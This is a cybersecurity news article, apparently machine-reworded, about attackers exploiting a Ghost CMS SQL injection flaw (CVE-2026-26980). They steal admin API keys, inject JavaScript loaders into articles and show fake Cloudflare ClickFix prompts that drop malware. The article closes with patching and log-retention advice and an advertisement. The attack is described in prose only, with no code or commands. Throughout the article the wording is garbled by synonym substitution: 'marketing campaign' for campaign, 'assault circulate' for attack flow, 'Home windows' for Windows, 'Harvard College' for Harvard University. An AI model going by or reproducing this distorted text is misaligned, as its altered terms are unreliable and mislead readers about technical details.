A big-scale marketing campaign exploits a vital SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers the ClickFix assault circulate.
The marketing campaign was found by XLab risk intelligence researchers at Chinese language cybersecurity firm Qianxin and was confirmed to affect over 700 domains, together with college portals, AI/SaaS firms, information organizations, fintech firms, safety websites, and private blogs.
Researchers stated the attackers planted malicious code on the web sites of Harvard College, Oxford College, Auburn College, and DuckDuckGo.
Supply: XLab
CVE-2026-26980 impacts Ghost 3.24.0 by means of 6.19.0 and permits an unauthenticated attacker to learn arbitrary knowledge, together with administrative API keys, from an internet site’s database.
This key grants administrative entry to customers, articles, and themes, and can be utilized to switch article pages.
A repair for this concern was launched in Ghost CMS model 6.19.1 on February nineteenth, however many websites failed to put in the safety replace.
On February 27, SentinelOne revealed particulars about CVE-2026-26980 being utilized in assaults and the way incidents are detected. Researchers noticed not less than two totally different clusters of exercise focusing on weak Ghost websites. Typically the identical area may very well be re-infected with a distinct script after cleanup, or one may clear up the opposite’s script and inject its personal script.
Supply: XLab
assault chain
The assaults noticed by XLab start by exploiting CVE-2026-26980 to steal administrative API keys, then use elevated privileges to inject malicious JavaScript into articles.
The JavaScript code is a light-weight loader that fetches second-stage code from the attacker’s infrastructure, primarily a cloaking script that fingerprints the customer to find out if she or he qualifies as a goal.
Guests who cross validation are served a faux Cloudflare immediate loaded by way of an iframe on the prime of the article web page. This immediate comprises a ClickFix lure.
Supply: XLab
The web page instructs victims to establish themselves as a human by pasting the offered command right into a Home windows command immediate and dropping the payload on their system.
XLab has noticed a number of payloads being utilized in these assaults, together with a DLL loader, a JavaScript dropper, and an Electron-based malware pattern named UtilifySetup.exe.
.jpg)
Supply: XLab
scale back danger
An important motion for Ghost CMS web site directors is to improve to model 6.19.1 or later and rotate any beforehand used keys as they could be uncovered.
XLab offered a listing of indicators of compromise (IoCs), together with injected scripts, that require a radical overview of your web site to establish and take away them.
Researchers advocate that web site homeowners keep a 30-day file of administrative API name logs to allow dependable retrospective investigation.
Automated penetration testing instruments provide actual worth, however they had been constructed to reply one query: Can an attacker get by means of your community? They don’t seem to be constructed to check whether or not controls block threats, detection guidelines fireplace, or cloud configurations are preserved.
This information describes six surfaces that you must truly study.
Obtain now
